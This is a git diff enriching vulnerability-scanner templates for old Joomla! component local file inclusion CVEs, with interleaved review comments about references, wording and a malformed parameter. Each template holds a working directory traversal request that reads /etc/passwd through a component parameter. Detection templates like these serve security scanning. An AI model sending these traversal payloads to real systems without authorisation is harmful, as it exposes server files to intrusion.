@@ -4,24 +4,27 @@ info: name: Joomla! Component JProject Manager 1.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. - reference: | + description: A directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: - https://www.exploit-db.com/exploits/12146 - https://www.cvedetails.com/cve/CVE-2010-1469 + - http://packetstormsecurity.org/1004-exploits/joomlajprojectmanager-lfi.txt + - http://www.exploit-db.com/exploits/12146 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1469 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1470.yaml b/cves/2010/CVE-2010-1470.yaml index bcb3e84703..bf37563f9b 100644 --- a/cves/2010/CVE-2010-1470.yaml +++ b/cves/2010/CVE-2010-1470.yaml 
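Review bot: The added reference `http://www.exploit-db.com/exploits/12146` duplicates the existing `https://www.exploit-db.com/exploits/12146` two lines above, differing only in scheme; drop the new line. The same duplicate-by-scheme pattern appears in the CVE-2010-1472 hunk (exploit 12167) and the CVE-2010-1494 hunk (exploit 12113).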
@@ -4,24 +4,26 @@ info: name: Joomla! Component Web TV 1.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and have possibly other unspecified impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12166 - https://www.cvedetails.com/cve/CVE-2010-1470 + - http://secunia.com/advisories/39405 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1470 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1471.yaml b/cves/2010/CVE-2010-1471.yaml index b68e50d8b6..7234a24465 100644 --- a/cves/2010/CVE-2010-1471.yaml +++ b/cves/2010/CVE-2010-1471.yaml 
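Review bot: The reworded description ends with "read arbitrary files and have possibly other unspecified impacts", which is awkward and differs from the phrasing the sibling hunks settle on ("and possibly have unspecified other impacts"). Since the batch is being normalised anyway, suggest `... allows remote attackers to read arbitrary files and possibly have other unspecified impacts via a .. (dot dot) in the controller parameter to index.php.` so the set reads uniformly.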
@@ -4,24 +4,25 @@ info: name: Joomla! Component Address Book 1.5.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12170 - https://www.cvedetails.com/cve/CVE-2010-1471 + - http://www.vupen.com/english/advisories/2010/0862 + classification: + cve-id: CVE-2010-1471 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1472.yaml b/cves/2010/CVE-2010-1472.yaml index 4294244baf..ae7f3c1f22 100644 --- a/cves/2010/CVE-2010-1472.yaml +++ b/cves/2010/CVE-2010-1472.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component Horoscope 1.5.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12167 - https://www.cvedetails.com/cve/CVE-2010-1472 + - http://secunia.com/advisories/39406 + - http://www.exploit-db.com/exploits/12167 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1472 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1473.yaml b/cves/2010/CVE-2010-1473.yaml index c2e7878067..02b9972d70 100644 --- a/cves/2010/CVE-2010-1473.yaml +++ b/cves/2010/CVE-2010-1473.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component Advertising 0.25 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12171 - https://www.cvedetails.com/cve/CVE-2010-1473 + - http://packetstormsecurity.org/1004-exploits/joomlaeasyadbanner-lfi.txt + - http://secunia.com/advisories/39410 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1473 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1474.yaml b/cves/2010/CVE-2010-1474.yaml index bad1b8ef59..c7a14e2d70 100644 --- a/cves/2010/CVE-2010-1474.yaml +++ b/cves/2010/CVE-2010-1474.yaml 
@@ -4,24 +4,26 @@ info: name: Joomla! Component Sweetykeeper 1.5 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12182 - https://www.cvedetails.com/cve/CVE-2010-1474 + - http://secunia.com/advisories/39388 + classification: + cve-id: CVE-2010-1474 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/03/30 diff --git a/cves/2010/CVE-2010-1475.yaml b/cves/2010/CVE-2010-1475.yaml index 44a2dd1650..bb3e999cac 100644 --- a/cves/2010/CVE-2010-1475.yaml +++ b/cves/2010/CVE-2010-1475.yaml 
@@ -4,24 +4,26 @@ info: name: Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12147 - https://www.cvedetails.com/cve/CVE-2010-1475 + - http://secunia.com/advisories/39285 + classification: + cve-id: CVE-2010-1475 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/03/24 diff --git a/cves/2010/CVE-2010-1476.yaml b/cves/2010/CVE-2010-1476.yaml index c1718acac9..156adbb01b 100644 --- a/cves/2010/CVE-2010-1476.yaml +++ b/cves/2010/CVE-2010-1476.yaml 
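Review bot: The request path carries `controller==../` with a doubled `=`, so the parameter value begins with a literal `=`; the line is unchanged context, but it looks like a typo the commit could have corrected while touching this file, and if the target rejects the malformed value the template silently never matches, producing a false negative rather than an error. Confirm against the referenced exploit-db entry and either fix the parameter or leave a comment explaining why the extra `=` is intended. This hunk also omits the `remediation` line that most of its neighbours add.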
@@ -4,24 +4,27 @@ info: name: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php. + description: A directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/12150 - https://www.cvedetails.com/cve/CVE-2010-1476 + - http://packetstormsecurity.org/1004-exploits/joomlaalphauserpoints-lfi.txt + - http://www.alphaplug.com/ + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1476 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1478.yaml b/cves/2010/CVE-2010-1478.yaml index 850f9aa938..e364de8273 100644 --- a/cves/2010/CVE-2010-1478.yaml +++ b/cves/2010/CVE-2010-1478.yaml 
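Review bot: The added reference `http://www.alphaplug.com/` is a bare vendor homepage rather than an advisory, changelog or fixed-version page, so it gives a reader nothing to act on and stops being meaningful if the domain changes hands; either point at the specific advisory or drop it. The other added link uses the packetstormsecurity.org domain, which may need updating to resolve today.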
@@ -4,24 +4,28 @@ info: name: Joomla! Component Jfeedback 1.2 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. - reference: | + description: A directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + reference: - https://www.exploit-db.com/exploits/12145 - https://www.cvedetails.com/cve/CVE-2010-1478 + - http://secunia.com/advisories/39262 + - http://www.securityfocus.com/bid/39390 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1478 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1491.yaml b/cves/2010/CVE-2010-1491.yaml index 865fd5f04f..bbda15aa41 100644 --- a/cves/2010/CVE-2010-1491.yaml +++ b/cves/2010/CVE-2010-1491.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component MMS Blog 2.3.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12318 - https://www.cvedetails.com/cve/CVE-2010-1491 + - http://packetstormsecurity.org/1004-exploits/joomlammsblog-lfi.txt + - http://secunia.com/advisories/39533 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1491 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1494.yaml b/cves/2010/CVE-2010-1494.yaml index 290ff32940..db3b3fdb9f 100644 --- a/cves/2010/CVE-2010-1494.yaml +++ b/cves/2010/CVE-2010-1494.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component AWDwall 1.5.4 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12113 - https://www.cvedetails.com/cve/CVE-2010-1494 + - http://www.osvdb.org/63943 + - http://www.exploit-db.com/exploits/12113 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1494 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1495.yaml b/cves/2010/CVE-2010-1495.yaml index 3d3b10b6bb..d94775f64e 100644 --- a/cves/2010/CVE-2010-1495.yaml +++ b/cves/2010/CVE-2010-1495.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component Matamko 1.01 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12286 - https://www.cvedetails.com/cve/CVE-2010-1495 + - http://www.vupen.com/english/advisories/2010/0929 + - http://packetstormsecurity.org/1004-exploits/joomlamatamko-lfi.txt + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1495 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1531.yaml b/cves/2010/CVE-2010-1531.yaml index c118f123cd..d76282552f 100644 --- a/cves/2010/CVE-2010-1531.yaml +++ b/cves/2010/CVE-2010-1531.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component redSHOP 1.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + description: A directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/12054 - https://www.cvedetails.com/cve/CVE-2010-1531 + - http://packetstormsecurity.org/1004-exploits/joomlaredshop-lfi.txt + - http://www.osvdb.org/63535 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1531 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/14 diff --git a/cves/2010/CVE-2010-1532.yaml b/cves/2010/CVE-2010-1532.yaml index 594664996b..5f2d0e4a18 100644 --- a/cves/2010/CVE-2010-1532.yaml +++ b/cves/2010/CVE-2010-1532.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12118 - https://www.cvedetails.com/cve/CVE-2010-1532 + - http://packetstormsecurity.org/1004-exploits/joomlapowermail-lfi.txt + - http://www.securityfocus.com/bid/39348 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1532 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1533.yaml b/cves/2010/CVE-2010-1533.yaml index 03ef38a6ea..0ca3569213 100644 --- a/cves/2010/CVE-2010-1533.yaml +++ b/cves/2010/CVE-2010-1533.yaml 
@@ -4,24 +4,26 @@ info: name: Joomla! Component TweetLA 1.0.1 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12142 - https://www.cvedetails.com/cve/CVE-2010-1533 + - http://secunia.com/advisories/39258 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1533 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1534.yaml b/cves/2010/CVE-2010-1534.yaml index 871c657677..7e5bf68a10 100644 --- a/cves/2010/CVE-2010-1534.yaml +++ b/cves/2010/CVE-2010-1534.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component Shoutbox Pro - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12067 - https://www.cvedetails.com/cve/CVE-2010-1534 + - http://www.securityfocus.com/bid/39213 + - http://secunia.com/advisories/39352 + remediation: Upgrade to a supported version + classification: + cve-id: CVE-2010-1534 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1535.yaml b/cves/2010/CVE-2010-1535.yaml index f4ad1e3c80..9b6bbe7ec5 100644 --- a/cves/2010/CVE-2010-1535.yaml +++ b/cves/2010/CVE-2010-1535.yaml 
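Review bot: `remediation: Upgrade to a supported version` is missing the trailing period that the same field carries in the CVE-2010-1531, CVE-2010-1532, CVE-2010-1533, CVE-2010-1603, CVE-2010-1858, CVE-2010-1952 and CVE-2010-1953 hunks; write `remediation: Upgrade to a supported version.` so the rendered text is uniform across the set.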
@@ -4,24 +4,26 @@ info: name: Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12151 - https://www.cvedetails.com/cve/CVE-2010-1535 + - http://secunia.com/advisories/39254 + classification: + cve-id: CVE-2010-1535 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/03/24 diff --git a/cves/2010/CVE-2010-1540.yaml b/cves/2010/CVE-2010-1540.yaml index b0afe05f6e..50d5e1c02d 100644 --- a/cves/2010/CVE-2010-1540.yaml +++ b/cves/2010/CVE-2010-1540.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component com_blog - Directory Traversal author: daffainfo severity: high - description: Directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter. - reference: | + description: A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter. + reference: - https://www.exploit-db.com/exploits/11625 - https://www.cvedetails.com/cve/CVE-2010-1540 + - http://secunia.com/advisories/38777 + - http://www.securityfocus.com/bid/38530 + classification: + cve-id: CVE-2010-1540 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/03/06 diff --git a/cves/2010/CVE-2010-1601.yaml b/cves/2010/CVE-2010-1601.yaml index 40716c0829..492c29e5d9 100644 --- a/cves/2010/CVE-2010-1601.yaml +++ b/cves/2010/CVE-2010-1601.yaml 
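Review bot: The `name` context line still reads `Joomla! Component com_blog - Directory Traversal` while the rewritten description and the request path both identify the component as MyBlog (`com_myblog`), so the template title does not match what it tests; consider `name: Joomla! Component MyBlog 3.0.329 - Local File Inclusion`, which also aligns with the `lfi` tag and the naming used by the neighbouring templates. The switch from `reference: |` to a plain list is the right fix, since the block scalar turned the reference list into a single string.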
@@ -4,24 +4,27 @@ info: name: Joomla! Component JA Comment - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + description: A directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. reference: - https://www.exploit-db.com/exploits/12236 - https://www.cvedetails.com/cve/CVE-2010-1601 + - http://secunia.com/advisories/39472 + - http://packetstormsecurity.org/1004-exploits/joomlajacomment-lfi.txt + classification: + cve-id: CVE-2010-1601 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/03/24 diff --git a/cves/2010/CVE-2010-1602.yaml b/cves/2010/CVE-2010-1602.yaml index 9a766ef802..9a48cb7693 100644 --- a/cves/2010/CVE-2010-1602.yaml +++ b/cves/2010/CVE-2010-1602.yaml 
@@ -4,24 +4,26 @@ info: name: Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12283 - https://www.cvedetails.com/cve/CVE-2010-1602 + - http://packetstormsecurity.org/1004-exploits/joomlazimbcomment-lfi.txt + classification: + cve-id: CVE-2010-1602 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/03/30 diff --git a/cves/2010/CVE-2010-1603.yaml b/cves/2010/CVE-2010-1603.yaml index dc2b52c09b..0ec6686201 100644 --- a/cves/2010/CVE-2010-1603.yaml +++ b/cves/2010/CVE-2010-1603.yaml 
@@ -4,24 +4,28 @@ info: name: Joomla! Component ZiMBCore 0.1 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in the ZiMB Core (aka ZiMBCore or com_zimbcore) component 0.1 in the ZiMB Manager collection for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in the ZiMB Core (aka ZiMBCore or com_zimbcore) component 0.1 in the ZiMB Manager collection for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12284 - https://www.cvedetails.com/cve/CVE-2010-1603 + - http://www.securityfocus.com/bid/39546 + - http://www.vupen.com/english/advisories/2010/0931 + remediation: Upgrade to a supported version. + classification: + cve-id: CVE-2010-1603 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/02/15 diff --git a/cves/2010/CVE-2010-1607.yaml b/cves/2010/CVE-2010-1607.yaml index 81f69a9578..54e1be5e91 100644 --- a/cves/2010/CVE-2010-1607.yaml +++ b/cves/2010/CVE-2010-1607.yaml 
@@ -4,24 +4,27 @@ info: name: Joomla! Component WMI 1.5.0 - Local File Inclusion author: daffainfo severity: high - description: Directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + description: A directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. reference: - https://www.exploit-db.com/exploits/12316 - https://www.cvedetails.com/cve/CVE-2010-1607 + - http://www.securityfocus.com/bid/39608 + - http://secunia.com/advisories/39539 + classification: + cve-id: CVE-2010-1607 tags: cve,cve2010,joomla,lfi requests: - method: GET path: - "{{BaseURL}}/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00" - matchers-condition: and matchers: - - type: regex regex: - - "root:.*:0:0" - + - "root:.*:0:0:" - type: status status: - 200 + +# Enhanced by mp on 2022/03/07 diff --git a/cves/2010/CVE-2010-1653.yaml b/cves/2010/CVE-2010-1653.yaml index fdc3e5d2a7..737487cfd0 100644 --- a/cves/2010/CVE-2010-1653.yaml +++ b/cves/2010/CVE-2010-1653.yaml 
